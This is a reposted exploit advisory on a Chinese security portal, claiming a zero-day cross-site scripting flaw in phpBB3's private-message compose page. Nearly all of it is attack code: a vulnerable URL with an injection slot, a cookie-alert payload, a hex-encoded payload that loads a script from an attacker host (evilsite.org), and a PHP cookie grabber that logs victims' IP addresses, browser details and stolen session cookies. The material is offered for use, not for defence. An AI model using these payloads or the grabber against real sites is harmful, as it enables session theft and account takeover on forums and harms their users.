首页 网络安全 安全学院 查看内容

XSS Private Messagging On PhpBB3(0day)

2009-2-4 08:20 950 1

摘要: ################################################## ##################################### ## Authors:...
关键词: 代码 程序 XSS Messagging WaRWolFz Private Dante90 PhpBB3 Priv8 Dante

################################################## ##################################### ## Authors: Dante90, WaRWolFz Crew ## T0T4L, Ex Member Crew ## Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] ## MSN: [email protected] ## Web: www.warwolfz.org ## Description: XSS (Cross Site Scripting), Grab Status: 100%. ## ################################################### ####################################XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] 程序代码: http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=6779 Where is: 程序代码: [xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}Redirect Code [Ascii --> Hex]: 程序代码: [xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e(<script src=http://www.evilsite.org/WaRWolFz/file.js>) Cookies grabber: 程序代码: <?php $ip = $_SERVER['REMOTE_ADDR'];$referer = $_SERVER['HTTP_REFERER'];$agent = $_SERVER['HTTP_USER_AGENT']; $data = $_GET['warwolfz'];$time = date("Y-m-d G:i:s A");$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n"; $file = fopen('cookies.html' , 'a');fwrite($file,$text);fclose($file); ?>
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

返回顶部